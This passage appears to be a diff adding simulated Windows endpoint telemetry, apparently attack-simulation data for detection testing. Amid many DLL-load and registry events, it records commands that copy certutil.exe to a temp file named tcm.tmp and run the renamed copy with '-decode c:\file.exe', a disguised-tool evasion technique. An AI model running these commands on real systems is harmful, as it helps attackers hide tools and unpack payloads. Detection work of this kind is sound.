"ncrypt.dll", + "image_path": "C:\\Windows\\System32\\ncrypt.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "ntasn1.dll", + "image_path": "C:\\Windows\\System32\\ntasn1.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "netapi32.dll", + "image_path": "C:\\Windows\\System32\\netapi32.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "normaliz.dll", + "image_path": "C:\\Windows\\System32\\normaliz.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "ntdsapi.dll", + "image_path": "C:\\Windows\\System32\\ntdsapi.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "setupapi.dll", + "image_path": "C:\\Windows\\System32\\setupapi.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500740000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "cfgmgr32.dll", + "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "shell32.dll", + "image_path": "C:\\Windows\\System32\\shell32.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "SHCore.dll", + "image_path": "C:\\Windows\\System32\\SHCore.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "windows.storage.dll", + "image_path": "C:\\Windows\\System32\\windows.storage.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\System32\\shlwapi.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "profapi.dll", + "image_path": "C:\\Windows\\System32\\profapi.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "powrprof.dll", + "image_path": "C:\\Windows\\System32\\powrprof.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "fltLib.dll", + "image_path": "C:\\Windows\\System32\\fltLib.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "ole32.dll", + "image_path": "C:\\Windows\\System32\\ole32.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\System32\\oleaut32.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "version.dll", + "image_path": "C:\\Windows\\System32\\version.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "secur32.dll", + "image_path": "C:\\Windows\\System32\\secur32.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "samcli.dll", + "image_path": "C:\\Windows\\System32\\samcli.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "dsrole.dll", + "image_path": "C:\\Windows\\System32\\dsrole.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "netutils.dll", + "image_path": "C:\\Windows\\System32\\netutils.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "logoncli.dll", + "image_path": "C:\\Windows\\System32\\logoncli.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "sspicli.dll", + "image_path": "C:\\Windows\\System32\\sspicli.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\System32\\imm32.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "uxtheme.dll", + "image_path": "C:\\Windows\\System32\\uxtheme.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "msctf.dll", + "image_path": "C:\\Windows\\System32\\msctf.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573500890000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "image_load", + "image_name": "dwmapi.dll", + "image_path": "C:\\Windows\\System32\\dwmapi.dll", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573501040000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "registry", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573501040000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "registry", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573501040000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "registry", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573501040000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "registry", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573501040000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "registry", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573501040000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "registry", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573501040000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "registry", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573501040000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "registry", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573501040000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "registry", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573501040000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "registry", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573501040000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "registry", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573501040000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "registry", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573501040000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "registry", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573501040000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "registry", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573501040000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "registry", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573501040000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "registry", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\WINDOWS\\system32\\certutil.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573501040000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "process", + "pid": 1688, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "subtype": "terminate", + "timestamp": 131883573501040000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" + }, + { + "event_type": "file", + "file_name": "CERTUTIL.EXE-CB7805D7.pf", + "file_path": "C:\\Windows\\Prefetch\\CERTUTIL.EXE-CB7805D7.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883573501040000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "process", + "pid": 4760, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573501040000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-00106CAC5501}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 4308, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573501270016, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010FEB35501}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4308, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573501200016, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010FEB35501}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4308, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573501200016, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010FEB35501}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4308, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573501200016, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010FEB35501}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4308, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573501200016, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010FEB35501}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4308, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573501200016, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010FEB35501}" + }, + { + "event_type": "process", + "pid": 4308, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573501360000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010FEB35501}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"cmd.exe /c copy %%windir%%\\\\system32\\\\certutil.exe %%temp%%tcm.tmp\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 3940, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573501930000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-00105FB85501}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3940, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573501820000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-00105FB85501}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3940, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573501820000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-00105FB85501}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3940, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573501820000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-00105FB85501}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3940, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573501820000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-00105FB85501}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3940, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573501820000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-00105FB85501}" + }, + { + "command_line": "cmd.exe /c copy C:\\WINDOWS\\\\system32\\\\certutil.exe C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3452, + "ppid": 3940, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573502020000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}", + "unique_ppid": "{42FC7E13-CBE6-5C05-0000-00105FB85501}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3452, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573501980000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3452, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573501980000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3452, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573501980000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3452, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573501980000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3452, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573501980000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" + }, + { + "event_type": "file", + "file_name": "Temptcm.tmp", + "file_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", + "pid": 3452, + "process_name": "cmd.exe", + "process_path": "C:\\WINDOWS\\system32\\cmd.exe", + "timestamp": 131883573501980000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 3452, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573501980000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 3452, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573501980000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3452, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573501980000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" + }, + { + "event_type": "image_load", + "image_name": "ntmarta.dll", + "image_path": "C:\\Windows\\System32\\ntmarta.dll", + "pid": 3452, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573501980000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 3452, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573501980000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" + }, + { + "event_type": "process", + "pid": 3452, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573502140000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" + }, + { + "event_type": "process", + "pid": 3940, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573502140000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-00105FB85501}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"cmd.exe /c %%temp%%tcm.tmp -decode c:\\file.exe\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 1852, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573502260000, + "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010F6BA5501}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": 